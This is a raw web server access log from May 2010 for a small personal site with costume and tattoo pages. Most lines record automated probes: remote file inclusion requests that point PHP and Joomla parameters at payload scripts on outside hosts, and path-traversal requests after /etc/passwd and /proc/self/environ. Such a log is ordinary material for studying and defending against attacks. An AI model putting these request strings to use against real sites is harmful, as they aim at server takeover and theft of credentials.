208.38.190.72 - - [28/May/2010:03:19:25 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.38.190.72 - - [28/May/2010:03:19:25 -0500] "GET /logs/access_log.1272672000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
208.38.190.72 - - [28/May/2010:03:19:25 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.38.190.72 - - [28/May/2010:03:19:25 -0500] "GET /logs/access_log.1272672000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
208.38.190.72 - - [28/May/2010:03:19:25 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.228.65.114 - - [28/May/2010:03:19:30 -0500] "GET /logs/access_log.1272672000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.228.65.114 - - [28/May/2010:03:19:30 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.228.65.114 - - [28/May/2010:03:19:30 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.228.65.114 - - [28/May/2010:03:19:31 -0500] "GET //facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.228.65.114 - - [28/May/2010:03:19:31 -0500] "GET /logs//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.228.65.114 - - [28/May/2010:03:19:31 -0500] "GET /logs/access_log.1272672000//facil-cms//includes/facil-settings.php?FACIL_THEME=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
155.144.40.31 - - [28/May/2010:03:19:42 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.bing.com/search?q=early+frank+gauls+costume&form=QBRE&filt=all&qs=n&sk=""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:57 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.1" 200 43371 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.1" 200 46283 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.1" 200 47836 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.1" 200 50528 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.1" 200 50000 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:58 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.1" 200 49391 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:19:59 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
155.144.40.31 - - [28/May/2010:03:20:00 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.50.85.15 - - [28/May/2010:03:20:02 -0500] "GET /logs/access_log.1271376000//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
85.153.27.146 - - [28/May/2010:03:20:14 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [28/May/2010:03:21:38 -0500] "GET /index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
210.109.108.186 - - [28/May/2010:03:25:01 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.109.108.186 - - [28/May/2010:03:25:02 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.109.108.186 - - [28/May/2010:03:25:03 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [28/May/2010:03:25:56 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.61.185.200 - - [28/May/2010:03:25:57 -0500] "GET /logs/access_log.1270512000///e404.php?DOCUMENT_ROOT=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
210.109.108.186 - - [28/May/2010:03:26:39 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
210.109.108.186 - - [28/May/2010:03:26:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.125.181.214 - - [28/May/2010:03:28:13 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.125.181.214 - - [28/May/2010:03:28:13 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
58.125.181.214 - - [28/May/2010:03:28:13 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
58.125.181.214 - - [28/May/2010:03:28:30 -0500] "GET /logs/access_log.1271376000//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:28:47 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:28:47 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:28:48 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.153.27.146 - - [28/May/2010:03:29:09 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
204.152.200.50 - - [28/May/2010:03:29:12 -0500] "GET /logs/index.php?option=com_jeformcr&content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:29:12 -0500] "GET /index.php?option=com_jeformcr&content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:29:15 -0500] "GET /logs/index.php?option=com_jeformcr&content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:29:15 -0500] "GET /index.php?option=com_jeformcr&content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:03:29:18 -0500] "GET /logs/index.php?option=com_jeformcr&content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
192.220.118.1 - - [28/May/2010:03:29:18 -0500] "GET /logs/access_log.1271548800/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 307 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:29:18 -0500] "GET /main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 280 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:29:18 -0500] "GET /logs/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 285 "-""Mozilla/5.0"
204.152.200.50 - - [28/May/2010:03:29:18 -0500] "GET /index.php?option=com_jeformcr&content=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
192.220.118.1 - - [28/May/2010:03:29:26 -0500] "GET /logs/access_log.1271548800/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 307 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:29:26 -0500] "GET /logs/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 285 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:29:26 -0500] "GET /main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 280 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:29:34 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:29:34 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:29:34 -0500] "GET /logs/access_log.1271548800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:30:00 -0500] "GET /main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 280 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:30:00 -0500] "GET /logs/access_log.1271548800/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 307 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:30:01 -0500] "GET /logs/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 285 "-""Mozilla/5.0"
85.153.27.146 - - [28/May/2010:03:32:48 -0500] "GET /index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [28/May/2010:03:33:37 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.153.27.146 - - [28/May/2010:03:33:37 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [28/May/2010:03:33:37 -0500] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.153.27.146 - - [28/May/2010:03:34:30 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.153.27.146 - - [28/May/2010:03:34:30 -0500] "GET /index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [28/May/2010:03:34:30 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
204.93.174.47 - - [28/May/2010:03:35:27 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:35:27 -0500] "GET /logs/access_log.1274227200%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:03:35:28 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:36:55 -0500] "GET /main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 280 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:36:55 -0500] "GET /logs/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 285 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:36:55 -0500] "GET /logs/access_log.1271548800/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 307 "-""Mozilla/5.0"
87.250.255.243 - - [28/May/2010:03:38:31 -0500] "GET /logs/access_log.1265241600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.91.234.162 - - [28/May/2010:03:38:50 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:51 -0500] "GET /*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:53 -0500] "GET /*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:54 -0500] "GET /*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:55 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:56 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:57 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:58 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:38:59 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:39:00 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:39:02 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:39:03 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:03:39:04 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
210.109.108.186 - - [28/May/2010:03:40:34 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
192.220.118.1 - - [28/May/2010:03:40:35 -0500] "GET /logs/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 285 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:40:35 -0500] "GET /main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 280 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:41:02 -0500] "GET /logs/access_log.1271548800/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 307 "-""Mozilla/5.0"
210.109.108.186 - - [28/May/2010:03:41:33 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
192.220.118.1 - - [28/May/2010:03:42:56 -0500] "GET /logs/access_log.1271548800/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 307 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:42:56 -0500] "GET /main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 280 "-""Mozilla/5.0"
192.220.118.1 - - [28/May/2010:03:42:56 -0500] "GET /logs/main.php?id=http://nic.bupt.edu.cn/media/j1.txt???? HTTP/1.0" 404 285 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:03 -0500] "GET /index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:03 -0500] "GET /logs/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:03 -0500] "GET /logs/access_log.1270857600/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:05 -0500] "GET /logs/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:05 -0500] "GET /index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:05 -0500] "GET /logs/access_log.1270857600/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:07 -0500] "GET /logs/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:07 -0500] "GET /logs/access_log.1270857600/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:07 -0500] "GET /index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:20 -0500] "GET /logs/access_log.1271116800/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:22 -0500] "GET /logs/access_log.1271116800/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
74.55.135.18 - - [28/May/2010:03:50:24 -0500] "GET /logs/access_log.1271116800/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
203.199.147.5 - - [28/May/2010:03:50:58 -0500] "GET /logs/access_log.1248220800 HTTP/1.1" 404 310 "http://www.google.co.in/search?hl=en&client=firefox-a&hs=cuv&rls=org.mozilla%3Aen-US%3Aofficial&ie=UTF-8&oe=UTF-8&q=WURFL%2B+download&btnG=Search&meta=""SonyEricssonK850i/R1EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1"
203.199.147.5 - - [28/May/2010:03:50:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""SonyEricssonK850i/R1EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1"
203.199.147.5 - - [28/May/2010:03:50:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""SonyEricssonK850i/R1EA Browser/NetFront/3.4 Profile/MIDP-2.1 Configuration/CLDC-1.1"
174.37.143.198 - - [28/May/2010:03:51:05 -0500] "GET /logs/access_log.1270857600/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:03:51:05 -0500] "GET /logs/access_log.1270857600/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:03:51:05 -0500] "GET /logs/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:03:51:05 -0500] "GET /index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:03:51:05 -0500] "GET /index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:03:51:05 -0500] "GET /logs/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:03:51:31 -0500] "GET /logs/access_log.1271116800/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
174.37.143.198 - - [28/May/2010:03:51:31 -0500] "GET /logs/access_log.1271116800/index_principal.php?pagina=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.44.120.2 - - [28/May/2010:03:52:29 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:03:52:29 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.255.243 - - [28/May/2010:03:53:08 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.207.148.125 - - [28/May/2010:03:53:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://search.conduit.com/Results.aspx?q=vintage+flash&meta=all&hl=pl&gl=pl&SelfSearch=1&SearchSourceOrigin=10&ctid=CT2412158""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
87.207.148.125 - - [28/May/2010:03:53:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
87.207.148.125 - - [28/May/2010:03:53:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
91.186.27.166 - - [28/May/2010:03:54:02 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.186.27.166 - - [28/May/2010:03:54:02 -0500] "GET /logs/access_log.1272240000//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
91.186.27.166 - - [28/May/2010:03:54:02 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
